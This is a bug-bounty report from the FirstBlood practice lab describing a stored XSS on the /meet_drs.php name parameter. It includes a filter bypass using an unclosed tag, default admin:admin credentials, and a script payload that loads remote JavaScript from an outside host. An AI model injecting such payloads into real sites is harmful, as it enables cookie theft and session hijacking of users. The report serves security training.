FirstBlood-#1268 — Stored XSS at meet drs.pho
This issue was discovered on FirstBlood v3
On 2022-12-09, ayush1098 
Level 8
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello Team,
Summary:
I have found a Stored XSS on /meet_drs.php endpoint in the name parameter. There is a filter which works when we close the tag, if we didn't close the tag, the payload will be executed on meet_drs.php.
Steps To Reproduce:
Login with admin:admin credentials on login.php.
Go to drpanel/edit-doctor.php?id=4 endpoint and put this payload in name parameter.
<script src="https://brutelogic.com.br/2.js"
The payload will be executed on meet_drs.php endpoint.
Impact:
Cookie Stealing, Session Hijacking etc..
Thanks & Regards
Ayush Singh
P2 High
Endpoint: /meet_drs.php
Parameter: name
Payload: "><script src="https://brutelogic.com.br/2.js"
FirstBlood ID: 54
Vulnerability Type: Stored XSS
It is possible to achieve stored XSS on the /meet_drs.php endpoint via a malicious doctors name